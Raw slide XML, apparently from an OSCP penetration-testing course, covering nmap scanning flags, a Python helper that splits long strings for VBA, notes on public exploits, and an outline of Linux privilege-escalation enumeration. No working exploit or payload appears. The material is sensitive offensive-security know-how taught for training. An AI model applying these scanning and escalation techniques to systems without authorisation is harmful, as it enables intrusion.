                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E2AD4E-601C-4C3D-AAE4-2DDCEED37CAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1559560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VBA has line-length limits, so I created a Python program to split long strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I made a mistake in my logic, can you spot it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416FD0A4-960D-475E-B8E1-2FC6E203F0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2864648" y="2763519"/>
            <a:ext cx="6483172" cy="3525522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1409029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(3/6)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4338" y="2028423"/>
            <a:ext cx="11363325" cy="3706625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting More Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Enables OS detection, version detection, script scanning, and traceroute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – OS guess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osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-guess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is most aggressive version)</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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Service and version info</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Script scans using default scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can specify scripts with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--script=&lt;list of scripts&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts usually located at:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2293C7B0-FAC2-4528-A19E-0DAFEDEC685F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2027652" y="1233342"/>
            <a:ext cx="8136696" cy="676369"/>
            <a:chOff x="241991" y="1233342"/>
            <a:chExt cx="8136696" cy="676369"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5B1146-7D4C-4882-B55B-33C95F703249}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="26432"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="241991" y="1233342"/>
              <a:ext cx="8136696" cy="676369"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46008F31-5B40-4A64-A22D-6163BCD555A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3807640" y="1233342"/>
              <a:ext cx="1996812" cy="226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11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B095D1D7-0FAE-47AA-8A66-FBB4CB390BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="31979" b="23887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593301" y="4798874"/>
            <a:ext cx="5775254" cy="1784488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27181894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407936-A4BD-4BED-B4EA-5D03644CFA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2BFC8C7-FF13-4501-8E46-D2B60C56E5E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Splitter Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1783F0F2-3FD9-4D67-AA54-BA72892870A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1254760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did not check for the remaining length, so it fills the space with blanks and prints the final quotation mark on a new line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{876A38A2-4FAA-4965-BEFD-77DBAF3A3E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="24624"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447280" y="3323601"/>
            <a:ext cx="4605858" cy="1467152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571B2657-755E-4A81-ACB0-55D259DE01AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="261136" y="2332678"/>
            <a:ext cx="6949080" cy="3778881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E935635-B740-401B-8DAF-5CC3DC454648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302332" y="2575328"/>
            <a:ext cx="4634602" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>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Import sys to access command line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args</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0592DEC-7E12-483E-97AB-3345D978651C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302332" y="3323601"/>
            <a:ext cx="4314001" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>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Use the first argument as the file path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9083545-FFA5-4DE2-BDE3-CF6A4144C263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3308442" y="4057272"/>
            <a:ext cx="2403222" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>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Reads the whole file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13F5AB81-5784-4F24-9761-C5C3B440D16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098863" y="5827858"/>
            <a:ext cx="9225602" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>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Breaks the line up into chunks of 50, adding the variable name in front of each line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8076626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8157DF-53E2-47DA-AF3C-754CA9563D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3DD3E70-00AF-40C5-BFB4-23B69F12C3BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s a Wrap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A352A472-6277-4437-894A-C5F09CDA7B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="7081837" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OSCP largely about public exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple sources to find them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence is key – edits or different exploits may be needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting not a big part of OSCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be able to read more than write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifications are generally minor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t forget the dangers of public exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7D50F6-47AB-403A-9AD5-315B58C3DFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8505825" y="1590674"/>
            <a:ext cx="3162300" cy="3952875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284345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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33117587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B8001-CD78-6846-91F1-30431D512F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798439" y="1303655"/>
            <a:ext cx="9721599" cy="2009720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 5:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38728454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CBD11B-49AB-450C-8399-EBF69253C10E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE2540A-F81D-440C-B849-1EDF852385B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Philosophy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumeration Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Am I?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s Going On?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I Alone?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673727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816A9-A332-4E11-8F76-D98B4A3E13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0B55CE-57AA-405F-BFAD-70032C4A9719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Philosophy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81257D4-2922-4BDE-AAB0-E6B9C72798FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal: Gaining privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(First) Target might not always be ‘root’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the real world: get just enough for objective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is enumeration round 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be methodical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take notes &amp; keep lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Biggest key: Know what’s common to spot the uncommon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5B4623-A75B-44AF-B915-AA929CF858F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7681802" y="1706772"/>
            <a:ext cx="3874024" cy="2439719"/>
            <a:chOff x="7681802" y="1706772"/>
            <a:chExt cx="3874024" cy="2439719"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="A picture containing text, clipart&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC8BEECF-2192-4ADB-87D7-E182E6F74C1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34" b="89956" l="5961" r="93715">
                          <a14:foregroundMark x1="6007" y1="32230" x2="6007" y2="32230"/>
                          <a14:foregroundMark x1="63909" y1="31236" x2="63909" y2="31236"/>
                          <a14:foregroundMark x1="67468" y1="53311" x2="67468" y2="53311"/>
                          <a14:foregroundMark x1="67930" y1="36424" x2="67930" y2="36424"/>
                          <a14:foregroundMark x1="78466" y1="48234" x2="78466" y2="48234"/>
                          <a14:foregroundMark x1="84011" y1="41943" x2="84011" y2="41943"/>
                          <a14:foregroundMark x1="93715" y1="35651" x2="93715" y2="35651"/>
                          <a14:foregroundMark x1="93484" y1="55740" x2="93484" y2="55740"/>
                          <a14:foregroundMark x1="62662" y1="68764" x2="62662" y2="68764"/>
                          <a14:foregroundMark x1="58457" y1="80905" x2="58457" y2="80905"/>
